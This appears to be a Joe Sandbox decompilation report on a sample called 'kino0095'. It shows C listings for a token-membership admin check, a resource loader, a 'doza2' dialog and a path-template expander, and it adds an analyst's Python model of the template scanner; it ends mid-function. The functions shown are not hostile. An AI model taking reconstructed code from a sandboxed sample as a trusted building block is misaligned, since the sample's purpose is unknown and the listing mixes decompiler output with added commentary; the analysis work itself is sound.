• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: doza2
• API String ID: 3785188418-612509477
• Opcode ID: 5e7abb7af16aab264f12e68ac5adc5c6244cf5acb0a0fc7a94151bf174923bbe
• Instruction ID: 21b9aa1756faa0d0bed4760a7978b486339069c82b355d53ed28f7dcc6ec7226
• Opcode Fuzzy Hash: 5e7abb7af16aab264f12e68ac5adc5c6244cf5acb0a0fc7a94151bf174923bbe
• Instruction Fuzzy Hash: FE11E431204221FBDB715F28ECCCBDA3ABCFB4A720F204A21F9D1AA194D77A8141C754
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
E010B18A3(void* __edx, void* __esi) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	char _v20;
	long _v24;
	void* _v28;
                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t51 = __esi;
                                                                                                                                                                                                                                    				_t49 = __edx;
                                                                                                                                                                                                                                    				_t23 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                    				_t25 =  *0x10b8128; // 0x2
                                                                                                                                                                                                                                    				_t45 = 0;
                                                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                                                    				_t50 = 2;
                                                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				if(_t25 != _t50) {
                                                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                                                    					return E010B6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E010B17EE( &_v20) != 0) {
                                                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                                                    						 *0x10b8128 = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                                                    					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						_pop(_t51);
                                                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x10b8128 = 1;
                                                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
0x010b18a3
0x010b18a3
0x010b18ab
0x010b18b2
0x010b18b5
0x010b18be
0x010b18c0
0x010b18c6
0x010b18c7
0x010b18ca
0x010b18cf
0x010b19c9
0x010b19d8
0x010b19d8
0x010b18df
0x010b19b8
0x010b19bd
0x010b19bf
0x010b19bf
0x00000000
0x010b19bd
0x010b18fa
0x00000000
0x00000000
0x010b1912
0x010b19aa
0x010b19ad
0x010b19b3
0x00000000
0x010b1927
0x010b1927
0x010b1932
0x010b1936
0x010b19a9
0x010b19a9
0x00000000
0x010b19a9
0x010b194c
0x010b19a2
0x010b19a3
0x00000000
0x010b196e
0x010b1970
0x010b1999
0x010b199c
0x00000000
0x010b199c
0x010b1972
0x010b1972
0x010b1975
0x010b1984
0x010b1985
0x010b198a
0x00000000
0x00000000
0x00000000
0x010b198c
0x010b1991
0x010b1996
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1996
                                                                                                                                                                                                                                    0x010b194c

APIs
• Part of subcall function 010B17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010B18DD), ref: 010B181A
• Part of subcall function 010B17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010B182C
• Part of subcall function 010B17EE: AllocateAndInitializeSid.ADVAPI32(010B18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010B18DD), ref: 010B1855
• Part of subcall function 010B17EE: FreeSid.ADVAPI32(?,?,?,?,010B18DD), ref: 010B1883
• Part of subcall function 010B17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010B18DD), ref: 010B188A
• GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010B18EB
• OpenProcessToken.ADVAPI32(00000000), ref: 010B18F2
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010B190A
• GetLastError.KERNEL32 ref: 010B1918
• LocalAlloc.KERNEL32(00000000,?,?), ref: 010B192C
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010B1944
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010B1964
• EqualSid.ADVAPI32(00000004,?), ref: 010B197A
• FreeSid.ADVAPI32(?), ref: 010B199C
• LocalFree.KERNEL32(00000000), ref: 010B19A3
• CloseHandle.KERNEL32(?), ref: 010B19AD
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
• String ID:
• API String ID: 2168512254-0
• Opcode ID: 1b69666a8e97b90c1cc3849bde43cace4bd3026e037af12a17dd0142f939735c
• Instruction ID: dbcc47d55e41dfc3ae0fd1a13b94f78b6fda634d26b845d56c55ef8094b16beb
• Opcode Fuzzy Hash: 1b69666a8e97b90c1cc3849bde43cace4bd3026e037af12a17dd0142f939735c
• Instruction Fuzzy Hash: FD313971A10209EBDB609FA9ECD8AEFBBBCFF04340F104469F685E2158D7369905CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
/* Decompiled resource loader: copies the RT_RCDATA (type 0xa) resource named by __ecx
   (the API list below shows the name "TITLE") into the caller's buffer __edx of capacity _a4.
   Returns the resource size on success, 0 if the resource is empty or cannot be locked,
   and the raw SizeofResource result when no buffer was supplied or it is too small. */
E010B468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
	long _t4;
	void* _t11;
	CHAR* _t14;
	void* _t15;
	long _t16;

	_t14 = __ecx;   /* resource name */
	_t11 = __edx;   /* destination buffer */
	_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
	_t16 = _t4;
	if(_t16 <= _a4 && _t11 != 0) {
		if(_t16 == 0) {
			L5:
			return 0;
		}
		/* second FindResourceA: the handle from the size query is not reused */
		_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
		if(_t15 == 0) {
			goto L5;
		}
		/* bounded copy: destination capacity _a4, source length _t16 */
		__imp__memcpy_s(_t11, _a4, _t15, _t16);
		FreeResource(_t15);
		return _t16;
	}
	return _t4;
}









APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
• SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
• LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
• LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
• memcpy_s.MSVCRT ref: 010B46E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$doza2
• API String ID: 3370778649-4167907646
• Opcode ID: 158d9544d48a66eb3c6b86304054b13ff1210deae79231d7b1730dcb8eab8af1
• Instruction ID: ce1b5148759a7ad47a12fe055d1f40a894802897020eb6eaf5b0e7ae3fde5b55
• Opcode Fuzzy Hash: 158d9544d48a66eb3c6b86304054b13ff1210deae79231d7b1730dcb8eab8af1
• Instruction Fuzzy Hash: 8101A232744210FBE37016A96CCCFAB3E6CDB89B61F040014FBCAD7145C966894483A2
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 57%
E010B17EE(intOrPtr* __ecx) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	_Unknown_base(*)()* _v20;
	void* _v24;
	intOrPtr* _v28;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t14;
	_Unknown_base(*)()* _t20;
	long _t28;
	void* _t35;
	struct HINSTANCE__* _t36;
	signed int _t38;
	intOrPtr* _t39;

	_t14 =  *0x10b8004; // 0x72151d89
	_v8 = _t14 ^ _t38;
	_v12 = 0x500;
	_t37 = __ecx;
	_v16.Value = 0;
	_v28 = __ecx;
	_t28 = 0;
	_t36 = LoadLibraryA("advapi32.dll");
	if(_t36 != 0) {
		_t20 = GetProcAddress(_t36, "CheckTokenMembership");
		_v20 = _t20;
		if(_t20 != 0) {
			 *_t37 = 0;
			_t28 = 1;
			if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
				_t37 = _t39;
				 *0x10ba288(0, _v24, _v28);
				_v20();
				if(_t39 != _t39) {
					asm("int 0x29");
				}
				FreeSid(_v24);
			}
		}
		FreeLibrary(_t36);
	}
	return E010B6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
}

Instruction addresses (per line of the listing above): 0x010b17f6 0x010b17fd 0x010b1805 0x010b180b 0x010b180d 0x010b1815 0x010b1818 0x010b1820 0x010b1824 0x010b182c 0x010b1832 0x010b1837 0x010b1851 0x010b1854 0x010b185d 0x010b1862 0x010b186c 0x010b1872 0x010b1877 0x010b187e 0x010b187e 0x010b1883 0x010b1883 0x010b185d 0x010b188a 0x010b188a 0x010b18a2

APIs
• LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010B18DD), ref: 010B181A
• GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010B182C
• AllocateAndInitializeSid.ADVAPI32(010B18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010B18DD), ref: 010B1855
• FreeSid.ADVAPI32(?,?,?,?,010B18DD), ref: 010B1883
• FreeLibrary.KERNEL32(00000000,?,?,?,010B18DD), ref: 010B188A
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: 47fea858cf0afd2b405097b12851c6b543069df8a9be40de6cf97216e87d3dd6
• Instruction ID: 11b5018a6638e6133fb47c9007683ec6a263f311a99296d5134c6f9ca79a41f8
• Opcode Fuzzy Hash: 47fea858cf0afd2b405097b12851c6b543069df8a9be40de6cf97216e87d3dd6
• Instruction Fuzzy Hash: 31116371F10209EBDB109FA5EC99AFEBBB8FF44701F100569FA45E7240DA759D008B91
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t7;
	void* _t11;
	struct HWND__* _t12;
	int _t22;
	struct HWND__* _t24;

	_t7 = _a8 - 0x10;
	if(_t7 == 0) {
		EndDialog(_a4, 2);
		L11:
		return 1;
	}
	_t11 = _t7 - 0x100;
	if(_t11 == 0) {
		_t12 = GetDesktopWindow();
		_t24 = _a4;
		E010B43D0(_t24, _t12);
		SetWindowTextA(_t24, "doza2");
		SetDlgItemTextA(_t24, 0x838,  *0x10b9404);
		SetForegroundWindow(_t24);
		goto L11;
	}
	if(_t11 == 1) {
		_t22 = _a12;
		if(_t22 < 6) {
			goto L11;
		}
		if(_t22 <= 7) {
			L8:
			EndDialog(_a4, _t22);
			return 1;
		}
                                                                                                                                                                                                                                    					if(_t22 != 0x839) {
                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x10b91dc = 1;
                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 010B3490
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B349A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 010B34B2
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 010B34C4
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 010B34CB
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 010B34D8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 852535152-612509477
                                                                                                                                                                                                                                    • Opcode ID: 3c9f6d3faed82d16ed8535ee004bbbce9c250da1b95e00417b5f1a900538d35f
                                                                                                                                                                                                                                    • Instruction ID: 7a161da6fbfad92185f5455dc2ad801bce95e2c5a1a0126060af7b2eedd5a94c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9f6d3faed82d16ed8535ee004bbbce9c250da1b95e00417b5f1a900538d35f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601B135340124ABD76A5F6DD9CC9EE3AA4FB05750B204824FAC69B584CF3EAE41CB80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

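The routine decompiled next, E010B2AAC, walks a template string one character at a time: it calls IsDBCSLeadByte on every byte and steps with CharNextA so that the second byte of a two-byte character is never mistaken for the 0x23 ('#') escape marker, turns '##' into a literal '#', and for '#E' (CharUpperA == 0x45) hands the output position together with the GetModuleFileNameA buffer to a helper whose body is not on this page. The Python below is an added analyst's model of that visible control flow; it is not code from the sample or from Joe Sandbox. It assumes code page 932 (Shift-JIS) lead-byte ranges for IsDBCSLeadByte, takes the '#E' insert as a caller-supplied string because E010B1680/E010B17C8 are not shown, and copies '#D' and any other escape through unchanged because the fragment ends before they are handled. It also shows, on a constructed cp932 path, why the lead-byte check matters: a naive byte search for '\\' (0x5C) matches the trail byte of the character 'ソ' (0x83 0x5C).

```python
# Added analyst's model of the DBCS-aware '#'-escape scanner seen in E010B2AAC.
# Not the sample's code. Assumptions: Windows code page 932 (Shift-JIS) lead-byte
# ranges; the '#E' insert is a caller-supplied string standing in for the
# module-path-derived helper that is not visible; '#D' and other escapes are
# copied unchanged because the decompiled fragment ends before handling them.

ESC = 0x23  # '#'


def is_dbcs_lead_byte(b: int) -> bool:
    """Model of IsDBCSLeadByte on a cp932 system (assumed code page)."""
    return 0x81 <= b <= 0x9F or 0xE0 <= b <= 0xFC


def char_next(buf: bytes, i: int) -> int:
    """Model of CharNextA: advance over one full character (1 or 2 bytes)."""
    if i >= len(buf):
        return i
    if is_dbcs_lead_byte(buf[i]) and i + 1 < len(buf):
        return i + 2
    return i + 1


def expand_template(src: bytes, e_insert: bytes) -> bytes:
    """Expand '##' -> '#' and '#E' -> e_insert, stepping by whole characters."""
    out = bytearray()
    i = 0
    while i < len(src):
        if src[i] != ESC:
            # Ordinary character: copy lead+trail bytes together, as the
            # decompiled loop does with IsDBCSLeadByte / _t65[1] = _t64[1].
            nxt = char_next(src, i)
            out += src[i:nxt]
            i = nxt
            continue
        i += 1                      # step past the '#'
        if i >= len(src):
            out += b"#"             # trailing lone '#': keep it
            break
        c = src[i]
        if c == ESC:                # '##' -> literal '#'
            out += b"#"
            i += 1
        elif c in (0x45, 0x65):     # '#E' / '#e' (CharUpperA == 0x45)
            out += e_insert         # assumption: stands in for the hidden helper
            i += 1
        else:                       # '#D' and anything else: not visible, keep as-is
            out += b"#"             # the following char is copied on the next pass
    return bytes(out)


def find_delim_naive(buf: bytes, delim: int) -> int:
    """Byte-wise search that ignores multi-byte characters."""
    return buf.find(bytes([delim]))


def find_delim_dbcs(buf: bytes, delim: int) -> int:
    """Search that steps over whole characters, as CharNextA would."""
    i = 0
    while i < len(buf):
        if buf[i] == delim:
            return i
        i = char_next(buf, i)
    return -1


# Constructed samples (not taken from the report).
TEMPLATE = b"name: ##1 path: #E"
# 'ソ' encodes in cp932 as 83 5C; its trail byte is the backslash.
PATH_WITH_TRAIL_BACKSLASH = "ソ\\x.txt".encode("cp932")

if __name__ == "__main__":
    print(expand_template(TEMPLATE, b"C:\\a.exe"))
    print("naive:", find_delim_naive(PATH_WITH_TRAIL_BACKSLASH, 0x5C),
          "dbcs:", find_delim_dbcs(PATH_WITH_TRAIL_BACKSLASH, 0x5C))
```

On the constructed path the naive search reports offset 1, which is inside the character 'ソ', while the character-stepping search reports offset 2, the real separator; this is the class of mistake the IsDBCSLeadByte/CharNextA pair in the decompiled loop avoids, and it is also why '#' (0x23), which can never be a trail byte in cp932, is still scanned with the same care.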
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E010B2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                                                    				char _t32;
                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                    				char* _t38;
                                                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    				CHAR* _t59;
                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t60 = __edx;
                                                                                                                                                                                                                                    				_t16 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                    				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                    				_t65 = _a4;
                                                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                                                    				_t64 = __ecx;
                                                                                                                                                                                                                                    				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                    					GetModuleFileNameA( *0x10b9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                    						_t17 =  *_t64;
                                                                                                                                                                                                                                    						if(_t17 == 0) {
                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                    						 *_t65 =  *_t64;
                                                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                                                    							_t65[1] = _t64[1];
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                    							L19:
				_t65 = CharNextA(_t65);
			} else {
				_t64 = CharNextA(_t64);
				if(CharUpperA( *_t64) != 0x44) {
					if(CharUpperA( *_t64) != 0x45) {
						if( *_t64 == 0x23) {
							goto L19;
						}
					} else {
						E010B1680(_t65, E010B17C8(_t44, _t65),  &_v268);
						_t52 = _t65;
						_t14 =  &(_t52[1]); // 0x2
						_t60 = _t14;
						do {
							_t32 =  *_t52;
							_t52 =  &(_t52[1]);
						} while (_t32 != 0);
						goto L17;
					}
				} else {
					E010B65E8( &_v268);
					_t55 =  &_v268;
					_t62 = _t55 + 1;
					do {
						_t34 =  *_t55;
						_t55 = _t55 + 1;
					} while (_t34 != 0);
					_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
					if(_t38 != 0 &&  *_t38 == 0x5c) {
						 *_t38 = 0;
					}
					E010B1680(_t65, E010B17C8(_t44, _t65),  &_v268);
					_t59 = _t65;
					_t12 =  &(_t59[1]); // 0x2
					_t60 = _t12;
					do {
						_t42 =  *_t59;
						_t59 =  &(_t59[1]);
					} while (_t42 != 0);
					L17:
					_t65 =  &(_t65[_t52 - _t60]);
				}
			}
			_t64 = CharNextA(_t64);
		}
		 *_t65 = _t17;
	}
	return E010B6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
}
0x010b2aac
0x010b2ab7
0x010b2abc
0x010b2abe
0x010b2ac3
0x010b2ac6
0x010b2ac9
0x010b2ace
0x010b2ae6
0x010b2bdc
0x010b2bdc
0x010b2be0
0x00000000
0x00000000
0x010b2af2
0x010b2afc
0x010b2b00
0x010b2b05
0x010b2b05
0x010b2b0b
0x010b2bca
0x010b2bd1
0x010b2b11
0x010b2b18
0x010b2b26
0x010b2b99
0x010b2bc8
0x00000000
0x00000000
0x010b2b9b
0x010b2bae
0x010b2bb3
0x010b2bb5
0x010b2bb5
0x010b2bb8
0x010b2bb8
0x010b2bba
0x010b2bbb
0x00000000
0x010b2bb8
0x010b2b28
0x010b2b2e
0x010b2b33
0x010b2b39
0x010b2b3c
0x010b2b3c
0x010b2b3e
0x010b2b3f
0x010b2b55
0x010b2b5d
0x010b2b64
0x010b2b64
0x010b2b7a
0x010b2b7f
0x010b2b81
0x010b2b81
0x010b2b84
0x010b2b84
0x010b2b86
0x010b2b87
0x010b2bbf
0x010b2bc1
0x010b2bc1
0x010b2b26
0x010b2bda
0x010b2bda
0x010b2be6
0x010b2be6
0x010b2bf8

APIs
• GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010B2AE6
• IsDBCSLeadByte.KERNEL32(00000000), ref: 010B2AF2
• CharNextA.USER32(?), ref: 010B2B12
• CharUpperA.USER32 ref: 010B2B1E
• CharPrevA.USER32(?,?), ref: 010B2B55
• CharNextA.USER32(?), ref: 010B2BD4
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
• String ID:
• API String ID: 571164536-0
• Opcode ID: 3374da3a52c5909ac9bb9cfd2fc80e8b85719692db4d8cd3dc975430b2b4fbc4
• Instruction ID: 7508a3a8d1a0f0d25b64235183fea101dfec0676ea8c831993a0cfaba0e1ea66
• Opcode Fuzzy Hash: 3374da3a52c5909ac9bb9cfd2fc80e8b85719692db4d8cd3dc975430b2b4fbc4
• Instruction Fuzzy Hash: BC412A346041459FDB669F3898D4EFE7FA9DF46340F0404DAD8C297202DF3A5A46CB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E010B43D0(struct HWND__* __ecx, struct HWND__* __edx) {
    signed int _v8;
    struct tagRECT _v24;
    struct tagRECT _v40;
    struct HWND__* _v44;
    intOrPtr _v48;
    int _v52;
    intOrPtr _v56;
    int _v60;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t29;
    void* _t53;
    intOrPtr _t56;
    int _t59;
    struct HWND__* _t63;
    struct HWND__* _t67;
    struct HWND__* _t68;
    struct HDC__* _t69;
    int _t72;
    signed int _t74;

    _t63 = __edx;
    _t29 = *0x10b8004; // 0x72151d89
    _v8 = _t29 ^ _t74;
    _t68 = __edx;
    _v44 = __ecx;
    GetWindowRect(__ecx, &_v40);
    _t53 = _v40.bottom - _v40.top;
    _v48 = _v40.right - _v40.left;
    GetWindowRect(_t68, &_v24);
    _v56 = _v24.bottom - _v24.top;
    _t69 = GetDC(_v44);
    _v52 = GetDeviceCaps(_t69, 8);
